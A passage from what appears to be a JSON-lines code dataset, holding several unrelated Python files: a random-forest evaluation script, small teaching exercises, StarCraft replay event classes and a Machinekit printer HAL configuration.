#Seggregate the data\n#two = x1.loc[x1[18191] == 2]\n#three = x1.loc[x1[18191] == 3]\n#four = x1.loc[x1[18191] == 4]\n#x = one.append([two, three, four])\n#print(x.shape, flush = True)\n\n\n#x = pd.DataFrame(data_matrix) \n#print(\"Starting Cross Fold\", flush = True)\n \nx = d1.head(5000)\nx = x[x.columns[0:100]]\nc = [1] * 1250 + [2] * 1250 + [3] * 1250 + [4] * 1250\nc = pd.DataFrame(c)\n\n\n#print(x['18191'], flash = True)\n#print(type(x['18191'][0]), flash = True)\n#print(type(x['18191']), flash = True)\n#x['18191'] = x['18191'].astype('category')\n\n#from sklearn import preprocessing \n#encoder = preprocessing.LabelEncoder()\n#c = encoder.fit_transform(c)\n\n\n#%%\nn_estimators = [int(x) for x in np.linspace(start = 200, stop = 2000, num = 10)]\nbootstrap = [True, False]\nmax_features = ['auto', 'sqrt']\n\nrandom_grid = {'n_estimators': n_estimators,'max_features': max_features, 'bootstrap':bootstrap}\nrf = RandomForestClassifier()\nsearch_model = RandomizedSearchCV(estimator = rf, \n param_distributions = random_grid, \n cv = 5, \n n_jobs = -1,\n verbose=5)\nprint(\"Parameter Tuning\")\nsearch_model.fit(x,c.values.ravel())\n\n#%%\nbest_params = search_model.best_params_\nprint(\"Best Parameters Values: \",best_params,flush=True)\nprint(\"Best Score: \",search_model.best_score_,flush=True)\n#%%\nXX = x\nYY = c\n\nn_splits = 5\nkf = KFold(n_splits=n_splits, shuffle=True)\n\ncon = []\nacc = []\nre = []\npr = []\nf1 = []\nauc_val = []\nd = {1,2,3}\nprint(\"Cross-Fold Validation\",flush = True)\nfor e in d:\n print(\"Round: \", e, flush = True)\n for train_index, val_index in kf.split(XX):\n print(train_index)\n print(val_index)\n auc1 = []\n\n print('Modelling', flush = True)\n model = RandomForestClassifier(**best_params)\n #model = RandomizedSearchCV(estimator = rf, param_distributions = random_grid, cv = 2, n_jobs = -1)\n\n model.fit(XX.iloc[train_index], YY.iloc[train_index].values.ravel())\n #best_random = model.best_estimator_\n print('Predicting', flush = True)\n\n pred = model.predict(XX.iloc[val_index])\n pred_prb = model.predict_proba(XX.iloc[val_index])\n print('Metrics', flush = True)\n for i in [1,2,3,4]:\n fpr, tpr, thresholds = metrics.roc_curve(YY.iloc[val_index], np.max(pred_prb, axis=1), pos_label= i)\n auc1.append(auc(fpr, tpr))\n \n \n matrix = confusion_matrix(YY.iloc[val_index], pred)\n\n acc1 = matrix.diagonal()/matrix.sum(axis=1)\n re1 = recall_score(YY.iloc[val_index], pred, average=None)\n pr1 = precision_score(YY.iloc[val_index], pred, average=None)\n f11 = f1_score(YY.iloc[val_index], pred, average=None)\n \n\n\n acc.append(acc1)\n re.append(re1)\n pr.append(pr1)\n f1.append(f11)\n con.append(matrix)\n auc_val.append(auc1)\n\n\n# In[37]:\n\nAccuracy = pd.DataFrame(acc, columns =['1', '2', '3', '4'])\n\nPrecision = pd.DataFrame(pr, columns =['1', '2', '3', '4'])\n\nRecall = pd.DataFrame(re, columns =['1', '2', '3', '4'])\n\nF1score = pd.DataFrame(f1, columns =['1', '2', '3', '4'])\n\nAUC = pd.DataFrame(auc_val, columns =['1', '2', '3', '4'])\ntin = []\nfin =list(Accuracy.mean())\nfin.append('Accuracy')\nfin\ngin = list(Precision.mean())\ngin.append('Precision')\ngin\ndin = list(Recall.mean())\ndin.append('Recall')\ndin\njam= list(F1score.mean())\njam.append('F1score')\njam\naam = list(AUC.mean())\naam.append('AUC')\naam\ntin.append(fin)\ntin.append(gin)\ntin.append(din)\ntin.append(jam)\ntin.append(aam)\ntin\nprint(tin, flush=True)\nResults_Randomforest = pd.DataFrame(tin,columns =['1', '2', '3', '4', 'Metrics']) \nResults_Randomforest.to_csv('RandomForestoutput.csv')\n\n","sub_path":"QCRI_Modelling_RandomForest_h2o.py","file_name":"QCRI_Modelling_RandomForest_h2o.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"25070789","text":"#for语句实现\ndef stars(rows):\n for row in range(1, rows + 1):\n for space in range(0, rows - row):\n print(\" \", end=\"\")\n for can in range(0, row * 2 - 1):\n print(\"*\", end=\"\")\n print(\"\")\n\nstars(8)\n\n\n#while语句实现\n# def yanghui(j):\n# i=1\n# j=10\n# while i<=j:\n# print(\" \"*(j-i),\"*\"*(2*i-1))\n# i+=1\n#\n# yanghui(8)","sub_path":"函数杨辉三角.py","file_name":"函数杨辉三角.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"68624837","text":"#!/usr/bin/python\n\n'''\n\nCopyright (c) 2014 Schmichael Chen\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nAuthor: Schmichael Chen \n\n'''\n\n# References\n# ++++++++++\n\n# 1) http://www.ibm.com/developerworks/library/os-python8/\n\n# 2) http://stackoverflow.com/questions/12330522/reading-a-file-without-newlines\n\n# 3) http://stackoverflow.com/questions/82831/how-do-i-check-if-a-file-exists-using-python\n\n# 4) http://stackoverflow.com/questions/9381463/how-to-create-a-file-in-linux-from-terminal-window\n\n# 5) http://stackoverflow.com/questions/17115664/can-linux-cat-command-be-used-for-writing-text-to-file\n\nimport os \n\nimport os.path\n\nfrom sys import stdout\n\nimport global_variables\n\nfrom __print__ import __print__ \n\ndef best_score():\n\n\tif os.path.isfile(\"score_file.txt\") == False:\n\n\t\tos.system(\"echo 0 > score_file.txt\")\t\n\n\t\tstdout.write(\"\\nBest Score: \")\n\n\t\t__print__(0)\n\n\telse:\n\n\t\tscore_from_score_file = open(\"score_file.txt\",'r').read().split('\\n')\n\n\t\tstdout.write(\"\\nBest Score: \")\n\n\t\tif score_from_score_file[0] > global_variables.score:\n\n\t\t\t__print__(score_from_score_file[0])\n\n\t\telse:\n\n\t\t\t__print__(global_variables.score)\n","sub_path":"best_score.py","file_name":"best_score.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"551892623","text":"# Patrick Kunst\n# Lab 7\n# CSC 242\n\ndef printPattern(a, b=0):#FIX LATER\n if a==1:\n print(' '*b + '*')\n else:\n printPattern(a//2, b)\n print(' '*b + '*'*a)\n printPattern(a//2, b+a//2)\n\n \n\ndef gcd(m, n):\n if m==0:\n return n\n\n elif n==0:\n return m\n\n elif m>n:\n return(gcd(n, m-n))\n\n else:\n return(gcd(m, n-m))\n\ndef f(x):\n if x==0:\n return 0\n\n elif x==1:\n return 1\n\n else:\n return (f(x-1) + f(x-2))/2\n\nif __name__=='__main__':\n import doctest\n doctest.testfile('lab7TEST.py')\n","sub_path":"lab7.py","file_name":"lab7.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"46176554","text":"from __future__ import absolute_import\n\nfrom sc2reader.utils import Length, LITTLE_ENDIAN\nfrom sc2reader.data import Unit\nfrom sc2reader.log_utils import loggable\n\n@loggable\nclass Event(object):\n name = 'Event'\n\n def __init__(self, frame, pid):\n self.pid = pid\n self.frame = frame\n self.second = frame >> 4\n self.time = Length(seconds=self.second)\n\n def load_context(self, replay):\n if self.pid != 16:\n self.player = replay.person[self.pid]\n\n def _str_prefix(self):\n player_name = self.player.name if getattr(self,'pid', 16)!=16 else \"Global\"\n return \"%s\\t%-15s \" % (Length(seconds=int(self.frame/16)), player_name)\n\n def __str__(self):\n return self._str_prefix() + self.name\n\n@loggable\nclass GameEvent(Event):\n name = 'GameEvent'\n\n \"\"\"Abstract Event Type, should not be directly instanciated\"\"\"\n def __init__(self, frame, pid, event_type):\n super(GameEvent, self).__init__(frame, pid)\n\n self.type = event_type\n self.is_local = (pid != 16)\n event_class = event_type >> 4\n self.is_init = (event_class == 0)\n self.is_player_action = (event_class == 1)\n self.is_camera_movement = (event_class == 3)\n\n#############################################3\n# Message Events\n#########################\n\n@loggable\nclass MessageEvent(Event):\n name = 'MessageEvent'\n\n def __init__(self, frame, pid, flags):\n super(MessageEvent, self).__init__(frame, pid)\n self.flags=flags\n\n@loggable\nclass ChatEvent(MessageEvent):\n name = 'ChatEvent'\n\n def __init__(self, frame, pid, flags, target, text):\n super(ChatEvent, self).__init__(frame, pid, flags)\n self.target = target\n self.text = text\n self.to_all = (self.target == 0)\n self.to_allies = (self.target == 2)\n self.to_observers = (self.target == 4)\n\n@loggable\nclass PacketEvent(MessageEvent):\n name = 'PacketEvent'\n\n def __init__(self, frame, pid, flags, info):\n super(PacketEvent, self).__init__(frame, pid, flags)\n self.info = info\n\n@loggable\nclass PingEvent(MessageEvent):\n name = 'PingEvent'\n\n def __init__(self, frame, pid, flags, x, y):\n super(PingEvent, self).__init__(frame, pid, flags)\n self.x, self.y = x, y\n\n\n#############################################3\n# Game Events\n#########################\n\nclass UnknownEvent(GameEvent):\n name = 'UnknownEvent'\n\nclass PlayerJoinEvent(GameEvent):\n name = 'PlayerJoinEvent'\n\n def __init__(self, frames, pid, event_type, flags):\n super(PlayerJoinEvent, self).__init__(frames, pid, event_type)\n self.flags = flags\n\nclass GameStartEvent(GameEvent):\n name = 'GameStartEvent'\n\nclass PlayerLeaveEvent(GameEvent):\n name = 'PlayerLeaveEvent'\n\nclass CameraEvent(GameEvent):\n name = 'CameraEvent'\n\n def __init__(self, frames, pid, event_type, x, y, distance, pitch, yaw, height_offset):\n super(CameraEvent, self).__init__(frames, pid, event_type)\n self.x, self.y = x, y\n self.distance = distance\n self.pitch = pitch\n self.yaw = yaw\n self.height_offset = height_offset\n\n def __str__(self):\n return self._str_prefix() + \"{0} at ({1}, {2})\".format(self.name, self.x,self.y)\n\nclass PlayerActionEvent(GameEvent):\n name = 'PlayerActionEvent'\n\n@loggable\nclass SendResourceEvent(PlayerActionEvent):\n name = 'SendResourceEvent'\n\n def __init__(self, frames, pid, event_type, target, minerals, vespene, terrazine, custom):\n super(SendResourceEvent, self).__init__(frames, pid, event_type)\n self.sender = pid\n self.reciever = target\n self.minerals = minerals\n self.vespene = vespene\n self.terrazine = terrazine\n self.custom = custom\n\n def __str__(self):\n return self._str_prefix() + \" transfer {0} minerals, {1} gas, {2} terrazine, and {3} custom to {4}\" % (self.minerals, self.vespene, self.terrazine, self.custom, self.reciever)\n\n def load_context(self, replay):\n super(SendResourceEvent, self).load_context(replay)\n self.sender = replay.player[self.sender]\n self.reciever = replay.player[self.reciever]\n\n@loggable\nclass RequestResourceEvent(PlayerActionEvent):\n name = 'RequestResourceEvent'\n\n def __init__(self, frames, pid, event_type, minerals, vespene, terrazine, custom):\n super(RequestResourceEvent, self).__init__(frames, pid, event_type)\n self.minerals = minerals\n self.vespene = vespene\n self.terrazine = terrazine\n self.custom = custom\n\n def __str__(self):\n return self._str_prefix() + \" requests {0} minerals, {1} gas, {2} terrazine, and {3} custom\" % (self.minerals, self.vespene, self.terrazine, self.custom)\n\n@loggable\nclass AbilityEvent(PlayerActionEvent):\n name = 'AbilityEvent'\n\n def __init__(self, frame, pid, event_type, ability, flags):\n super(AbilityEvent, self).__init__(frame, pid, event_type)\n self.ability_code = ability\n self.ability_name = 'Uknown'\n self.flags = flags\n\n def load_context(self, replay):\n super(AbilityEvent, self).load_context(replay)\n if not replay.datapack:\n return\n\n if self.ability_code not in replay.datapack.abilities:\n if not getattr(replay, 'marked_error', None):\n replay.marked_error=True\n self.logger.error(replay.filename)\n self.logger.error(\"Release String: \"+replay.release_string)\n for player in replay.players:\n self.logger.error(\"\\t\"+str(player))\n\n self.logger.error(\"{0}\\t{1}\\tMissing ability {2} from {3}\".format(self.frame, self.player.name, hex(self.ability_code), replay.datapack.__class__.__name__))\n\n else:\n self.ability = replay.datapack.abilities[self.ability_code]\n self.ability_name = self.ability.name\n\n\n def __str__(self):\n return self._str_prefix() + \"Ability (%s) - %s\" % (hex(self.ability_code), self.ability_name)\n\n@loggable\nclass TargetAbilityEvent(AbilityEvent):\n name = 'TargetAbilityEvent'\n\n def __init__(self, frame, pid, event_type, ability, flags, target, player, team, location):\n super(TargetAbilityEvent, self).__init__(frame, pid, event_type, ability, flags)\n self.target = None\n self.target_id, self.target_type = target\n\n self.target_owner = None\n self.target_owner_id = player\n self.target_team = None\n self.target_team_id = team\n self.location = location\n\n # We can't know if it is a hallucination or not so assume not\n self.target_type = self.target_type << 8 | 0x01\n\n\n def load_context(self, replay):\n super(TargetAbilityEvent, self).load_context(replay)\n\n \"\"\" Disabled since this seems to have gone out of bounds\n sc2reader/ggtracker/204927.SC2Replay\n if self.target_owner_id:\n print replay.people\n print self.target_owner_id\n self.target_owner = replay.player[self.target_owner_id]\n \"\"\"\n\n \"\"\" Disabled since team seems to always be the same player\n if self.target_team_id:\n self.target_team = replay.team[self.target_team_id]\n \"\"\"\n\n if not replay.datapack:\n return\n\n uid = (self.target_id, self.target_type)\n if uid in replay.objects:\n self.target = replay.objects[uid]\n\n else:\n if self.target_type not in replay.datapack.units:\n self.logger.error(\"{0}\\t{1}\\tMissing unit {2} from {3}\".format(self.frame, self.player.name, hex(self.target_type), replay.datapack.id))\n unit = Unit(self.target_id)\n\n else:\n unit_class = replay.datapack.units[self.target_type]\n unit = unit_class(self.target_id)\n\n self.target = unit\n replay.objects[uid] = unit\n\n def __str__(self):\n if self.target:\n if isinstance(self.target, Unit):\n target = \"{0} [{1:0>8X}]\".format(self.target.name, self.target.id)\n else:\n target = \"{0:X} [{1:0>8X}]\".format(self.target[1], self.target[0])\n else:\n target = \"NONE\"\n\n return AbilityEvent.__str__(self) + \"; Target: {0}\".format(target)\n\n@loggable\nclass LocationAbilityEvent(AbilityEvent):\n name = 'LocationAbilityEvent'\n\n def __init__(self, frame, pid, event_type, ability, flags, location):\n super(LocationAbilityEvent, self).__init__(frame, pid, event_type, ability, flags)\n self.location = location\n\n def __str__(self):\n return AbilityEvent.__str__(self) + \"; Location: %s\" % str(self.location)\n\n@loggable\nclass SelfAbilityEvent(AbilityEvent):\n name = 'SelfAbilityEvent'\n\n def __init__(self, frame, pid, event_type, ability, flags, info):\n super(SelfAbilityEvent, self).__init__(frame, pid, event_type, ability, flags)\n self.info = info\n\n@loggable\nclass HotkeyEvent(PlayerActionEvent):\n name = 'HotkeyEvent'\n\n def __init__(self, frame, pid, event_type, hotkey, deselect):\n super(HotkeyEvent, self).__init__(frame, pid, event_type)\n self.hotkey = hotkey\n self.deselect = deselect\n\nclass SetToHotkeyEvent(HotkeyEvent):\n name = 'SetToHotkeyEvent'\n\nclass AddToHotkeyEvent(HotkeyEvent):\n name = 'AddToHotkeyEvent'\n\nclass GetFromHotkeyEvent(HotkeyEvent):\n name = 'GetFromHotkeyEvent'\n\n@loggable\nclass SelectionEvent(PlayerActionEvent):\n name = 'SelectionEvent'\n\n def __init__(self, frame, pid, event_type, bank, objects, deselect):\n super(SelectionEvent, self).__init__(frame, pid, event_type)\n self.bank = bank\n self.raw_objects = objects\n self.deselect = deselect\n\n def load_context(self, replay):\n super(SelectionEvent, self).load_context(replay)\n\n if not replay.datapack:\n return\n\n objects = list()\n data = replay.datapack\n for (obj_id, obj_type) in self.raw_objects:\n if (obj_id, obj_type) in replay.objects:\n obj = replay.objects[(obj_id,obj_type)]\n else:\n if obj_type in data.units:\n obj = data.units[obj_type](obj_id)\n else:\n msg = \"Unit Type {0} not found in {1}\"\n self.logger.error(msg.format(hex(obj_type), data.__class__.__name__))\n obj = Unit(obj_id)\n\n replay.objects[(obj_id,obj_type)] = obj\n\n objects.append(obj)\n\n\n self.objects = objects\n","sub_path":"sc2reader/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":10573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"59470544","text":"from machinekit import hal\nfrom machinekit import rtapi as rt\nfrom machinekit import config as c\n\nimport rcomps\nimport storage\nimport motion\n\ndef assign_param(name,signal,val):\n import subprocess\n subprocess.call(\"halcmd setp %s.%s %s\"%(name,signal,str(val)), shell=True )\n\n\n\ndef usrcomp_status(compname, signame, thread, resetSignal='estop-reset'):\n sigIn = hal.newsig('%s-error-in' % signame, hal.HAL_BIT)\n sigOut = hal.newsig('%s-error' % signame, hal.HAL_BIT)\n sigOk = hal.newsig('%s-ok' % signame, hal.HAL_BIT)\n\n sigIn.link('%s.error' % compname)\n\n safetyLatch = rt.newinst('safety_latch', 'safety-latch.%s-error' % signame)\n hal.addf(safetyLatch.name, thread)\n safetyLatch.pin('error-in').link(sigIn)\n safetyLatch.pin('error-out').link(sigOut)\n safetyLatch.pin('reset').link(resetSignal)\n safetyLatch.pin('threshold').set(500) # 500ms error\n safetyLatch.pin('latching').set(True)\n\n notComp = rt.newinst('not', 'not.%s-no-error' % signame)\n hal.addf(notComp.name, thread)\n notComp.pin('in').link(sigOut)\n notComp.pin('out').link(sigOk)\n\n\ndef usrcomp_watchdog(comps, enableSignal, thread,\n okSignal=None, errorSignal=None):\n count = len(comps)\n watchdog = rt.loadrt('watchdog', num_inputs=count)\n hal.addf('watchdog.set-timeouts', thread)\n hal.addf('watchdog.process', thread)\n for n, comp in enumerate(comps):\n compname = comp[0]\n comptime = comp[1]\n sigIn = hal.newsig('%s-watchdog' % compname, hal.HAL_BIT)\n hal.Pin('%s.watchdog' % compname).link(sigIn)\n watchdog.pin('input-%i' % n).link(sigIn)\n watchdog.pin('timeout-%i' % n).set(comptime)\n watchdog.pin('enable-in').link(enableSignal)\n\n if not okSignal:\n okSignal = hal.newsig('watchdog-ok', hal.HAL_BIT)\n watchdog.pin('ok-out').link(okSignal)\n\n if errorSignal:\n notComp = rt.newinst('not', 'not.watchdog-error')\n hal.addf(notComp.name, thread)\n notComp.pin('in').link(okSignal)\n notComp.pin('out').link(errorSignal)\n\n\ndef setup_stepper(stepgenIndex, section, axisIndex=None,\n stepgenType='hpg.stepgen', gantry=False,\n gantryJoint=0, velocitySignal=None, thread=None):\n stepgen = '%s.%01i' % (stepgenType, stepgenIndex)\n if axisIndex is not None:\n axis = 'axis.%i' % axisIndex\n hasMotionAxis = (axisIndex is not None) and (not gantry or gantryJoint == 0)\n velocityControlled = velocitySignal is not None\n\n # axis enable chain\n enableIndex = axisIndex\n if axisIndex is None:\n enableIndex = 0 # use motor enable signal\n enable = hal.Signal('emcmot-%i-enable' % enableIndex, hal.HAL_BIT)\n if hasMotionAxis:\n enable.link('%s.amp-enable-out' % axis)\n enable.link('%s.enable' % stepgen)\n\n # expose timing parameters so we can multiplex them later\n sigBase = 'stepgen.%i' % stepgenIndex\n\n assign_param(sigBase,\"position-scale\",c.find(section, 'SCALE'))\n assign_param(sigBase,\"maxaccel\",c.find(section, 'STEPGEN_MAXACC'))\n #assign_param(sigBase,\"maxvel\",c.find(\"ABP\", 'STEPGEN_MAXVEL'))\n\n # position command and feedback\n limitHome = hal.newsig('limit-%i-home' % axisIndex, hal.HAL_BIT)\n limitMin = hal.newsig('limit-%i-min' % axisIndex, hal.HAL_BIT)\n limitMax = hal.newsig('limit-%i-max' % axisIndex, hal.HAL_BIT)\n limitHome.link('%s.home-sw-in' % axis)\n limitMin.link('%s.neg-lim-sw-in' % axis)\n limitMax.link('%s.pos-lim-sw-in' % axis)\n\n if velocityControlled:\n hal.net(velocitySignal, '%s.velocity-cmd' % stepgen)\n\ndef setup_stepper_multiplexer(stepgenIndex, sections, selSignal, thread):\n num = len(sections)\n sigBase = 'stepgen-%i' % stepgenIndex\n\n unsignedSignals = [['dirsetup', 'DIRSETUP'],\n ['dirhold', 'DIRHOLD'],\n ['steplen', 'STEPLEN'],\n ['stepspace', 'STEPSPACE']]\n\n floatSignals = [['scale', 'SCALE'],\n ['max-vel', 'STEPGEN_MAX_VEL'],\n ['max-acc', 'STEPGEN_MAX_ACC']]\n\n for item in unsignedSignals:\n signal = hal.Signal('%s-%s' % (sigBase, item[0]), hal.HAL_U32)\n mux = rt.newinst('muxn_u32', 'mux%i.%s' % (num, signal.name), pincount=num)\n hal.addf(mux.name, thread)\n for n, section in enumerate(sections):\n mux.pin('in%i' % n).set(c.find(section, item[1]))\n mux.pin('sel').link(selSignal)\n mux.pin('out').link(signal)\n\n for item in floatSignals:\n signal = hal.Signal('%s-%s' % (sigBase, item[0]), hal.HAL_FLOAT)\n mux = rt.newinst('muxn', 'mux%i.%s' % (num, signal.name), pincount=num)\n hal.addf(mux.name, thread)\n for n, section in enumerate(sections):\n mux.pin('in%i' % n).set(c.find(section, item[1]))\n mux.pin('sel').link(selSignal)\n mux.pin('out').link(signal)\n\n\ndef setup_probe(thread):\n probeEnable = hal.newsig('probe-enable', hal.HAL_BIT)\n probeInput = hal.newsig('probe-input', hal.HAL_BIT)\n probeSignal = hal.newsig('probe-signal', hal.HAL_BIT)\n\n and2 = rt.newinst('and2', 'and2.probe-input')\n hal.addf(and2.name, thread)\n and2.pin('in0').link(probeSignal)\n and2.pin('in1').link(probeEnable)\n and2.pin('out').link(probeInput)\n\n probeInput += 'motion.probe-input'\n\n motion.setup_probe_io()\n\ndef setup_tclab():\n #import hal_tclab\n # from hal_tclab import prepare\n # prepare()\n hal.loadusr(\"hal_tclab\",name=\"hal_tclab\",wait_name=\"hal_tclab\",wait_timeout=30)\n hal.Pin(\"hal_tclab.enable\").link(hal.Signal(\"ALLenable\"))\n\n\n\ndef create_temperature_control(name, section, thread, hardwareOkSignal=None,\n coolingFan=None, hotendFan=None, tclab_index=0):\n\n tempSet = hal.newsig('%s-temp-set' % name, hal.HAL_FLOAT)\n tempMeas = hal.newsig('%s-temp-meas' % name, hal.HAL_FLOAT)\n tempInRange = hal.newsig('%s-temp-in-range' % name, hal.HAL_BIT)\n tempInRangePre = hal.newsig('%s-temp-in-range-pre-check' % name, hal.HAL_BIT)\n active = hal.newsig('%s-active' % name, hal.HAL_BIT)\n tempLimitMin = hal.newsig('%s-temp-limit-min' % name, hal.HAL_FLOAT)\n tempLimitMax = hal.newsig('%s-temp-limit-max' % name, hal.HAL_FLOAT)\n\n hal.Pin(\"hal_tclab.temperature-%s\"%str(tclab_index)).link(tempMeas)\n hal.Pin(\"hal_tclab.setpoint-%s\"%str(tclab_index)).link(tempSet)\n hal.Pin(\"hal_tclab.enable-%s\"%str(tclab_index)).link(active)\n active.set(1)\n tempInLimit = hal.newsig('%s-temp-in-limit' % name, hal.HAL_BIT)\n tempThermOk = hal.newsig('%s-temp-therm-ok' % name, hal.HAL_BIT)\n error = hal.newsig('%s-error' % name, hal.HAL_BIT)\n\n\n\n tempPidPgain = hal.newsig('%s-temp-pid-Pgain' % name, hal.HAL_FLOAT)\n tempPidIgain = hal.newsig('%s-temp-pid-Igain' % name, hal.HAL_FLOAT)\n tempPidDgain = hal.newsig('%s-temp-pid-Dgain' % name, hal.HAL_FLOAT)\n tempPidMaxerrorI = hal.newsig('%s-temp-pid-maxerrorI' % name, hal.HAL_FLOAT)\n tempPidOut = hal.newsig('%s-temp-pid-out' % name, hal.HAL_FLOAT)\n tempPidBias = hal.newsig('%s-temp-pid-bias' % name, hal.HAL_FLOAT)\n tempRangeMin = hal.newsig('%s-temp-range-min' % name, hal.HAL_FLOAT)\n tempRangeMax = hal.newsig('%s-temp-range-max' % name, hal.HAL_FLOAT)\n noErrorIn = hal.newsig('%s-no-error-in' % name, hal.HAL_BIT)\n errorIn = hal.newsig('%s-error-in' % name, hal.HAL_BIT)\n\n sum2 = rt.newinst('sum2', 'sum2.%s-temp-range-pos' % name)\n hal.addf(sum2.name, thread)\n sum2.pin('in0').link(tempSet)\n sum2.pin('in1').set(c.find(section, 'TEMP_RANGE_POS_ERROR'))\n sum2.pin('out').link(tempRangeMax)\n\n\n\n sum2 = rt.newinst('sum2', 'sum2.%s-temp-range-neg' % name)\n hal.addf(sum2.name, thread)\n sum2.pin('in0').link(tempSet)\n sum2.pin('in1').set(c.find(section, 'TEMP_RANGE_NEG_ERROR'))\n sum2.pin('out').link(tempRangeMin)\n\n #the output of this component will say if measured temperature is in range of set value\n wcomp = rt.newinst('wcomp', 'wcomp.%s-temp-in-range' % name)\n hal.addf(wcomp.name, thread)\n wcomp.pin('min').link(tempRangeMin)\n wcomp.pin('max').link(tempRangeMax)\n wcomp.pin('in').link(tempMeas)\n wcomp.pin('out').link(tempInRangePre)\n\n\n\n notActive = hal.newsig('%s-not-active' % name, hal.HAL_BIT)\n activeNot = rt.newinst('not','not.%s.active-not'%name)\n hal.addf(activeNot.name, thread)\n activeNot.pin('in').link(active)\n activeNot.pin('out').link(notActive)\n\n\n or2 = rt.newinst('orn', 'or2.%s-check-temp-in-range'%name, pincount='2')\n hal.addf(or2.name, thread)\n or2.pin('in1').link(tempInRangePre)\n\n or2.pin('in0').link(notActive)\n or2.pin('out').link(tempInRange)\n\n\n\n # limit the output temperature to prevent damage when thermistor is broken/removed\n wcomp = rt.newinst('wcomp', 'wcomp.%s-temp-in-limit' % name)\n hal.addf(wcomp.name, thread)\n wcomp.pin('min').link(tempLimitMin)\n wcomp.pin('max').link(tempLimitMax)\n wcomp.pin('in').link(tempMeas)\n wcomp.pin('out').link(tempInLimit)\n\n rcomps.create_temperature_rcomp(name)\n motion.setup_temperature_io(name)\n tempLimitMax.set(c.find(section,\"TEMP_LIMIT_MAX\"))\n print(\"max set to\",c.find(section,\"TEMP_LIMIT_MAX\"))\n tempLimitMin.set(c.find(section,\"TEMP_LIMIT_MIN\"))\n\ndef setup_estop(errorSignals, thread):\n # Create estop signal chain\n estopTest = hal.Signal('estop-test', hal.HAL_BIT)\n estopUser = hal.Signal('estop-user', hal.HAL_BIT)\n estopReset = hal.Signal('estop-reset', hal.HAL_BIT)\n estopOut = hal.Signal('estop-out', hal.HAL_BIT)\n estopIn = hal.Signal('estop-in', hal.HAL_BIT)\n estopError = hal.Signal('estop-error', hal.HAL_BIT)\n\n #num = len(errorSignals)\n #orComp = rt.newinst('orn', 'or%i.estop-error' % num, pincount=num)\n #hal.addf(orComp.name, thread)\n #for n, sig in enumerate(errorSignals):\n # orComp.pin('in%i' % n).link(sig)\n #orComp.pin('out').link(estopError)\n estopError.set(0)\n estopLatch = rt.newinst('estop_latch', 'estop-latch')\n hal.addf(estopLatch.name, thread)\n estopLatch.pin('ok-in').link(estopUser)\n estopLatch.pin('fault-in').link(estopError)\n estopLatch.pin('reset').link(estopReset)\n estopLatch.pin('ok-out').link(estopOut)\n\n\n estopReset.link('iocontrol.0.user-request-enable')\n estopUser.link('iocontrol.0.user-enable-out')\n\n\n # Monitor estop input from hardware\n estopIn.link('iocontrol.0.emc-enable-in')\n# hal.net('iocontrol.0.user-enable-out', 'iocontrol.0.emc-enable-in')\n\ndef setup_estop_loopback():\n # create signal for estop loopback\n hal.net('iocontrol.0.user-enable-out', 'iocontrol.0.emc-enable-in')\n\ndef setup_tool_loopback():\n hal.net('iocontrol.0.tool-prepare', 'iocontrol.0.tool-prepared')\n hal.net('iocontrol.0.tool-change', 'iocontrol.0.tool-changed')\n\ndef setup_delta():\n assign_param(\"lineardeltakins\",\"R\",\"295.4\")\n assign_param(\"lineardeltakins\",\"L\",\"654\")\n","sub_path":"fdm/config/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"216629834","text":"f=open('E:\\\\test.txt')\r\n\r\nsingle = []\r\ndouble = []\r\ncount = 1\r\nfor each_line in f:\r\n if each_line[:6] != '======':\r\n (role,line_spoken) = each_line.split('.',1)\r\n int(role)\r\n if role == '1':\r\n single.append(line_spoken)\r\n elif role =='2':\r\n double.append(line_spoken)\r\n else:\r\n file_name_single = 'single_' + str(count) + '.txt'\r\n file_name_double = 'double_' + str(count) + '.txt'\r\n\r\n single_file = open(file_name_single,'w')\r\n double_file = open(file_name_double,'w')\r\n\r\n single_file.writelines(single)\r\n double_file.writelines(double)\r\n\r\n single_file.close()\r\n double_file.close()\r\n\r\n single = []\r\n double = []\r\n count += 1\r\n\r\nf.close()\r\n\r\n \r\n","sub_path":"temp/file tidying.py","file_name":"file tidying.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"168402477","text":"#!/usr/bin/env python3\n\nfrom apps import *\nfrom tests import *\nimport sys\nfrom typing import Dict, Tuple, Union, cast\nimport copy\n\njava_home = \"/home/eurosys21/jvms/java_home\"\nhibench_home = \"/home/eurosys21/applications/HiBench\"\nspark_home = \"/home/eurosys21/applications/spark-2.3.2-bin-hadoop2.7\"\ndetc_home = \"/home/eurosys21/applications/detc\"\nmemcached_home = \"/home/eurosys21/applications/memcached-1.6.7\"\nbakers = set([ \"baker\" + str(i) for i in range(10, 17 + 1) ])\n\ndef minutes(m: int) -> int:\n\treturn m * 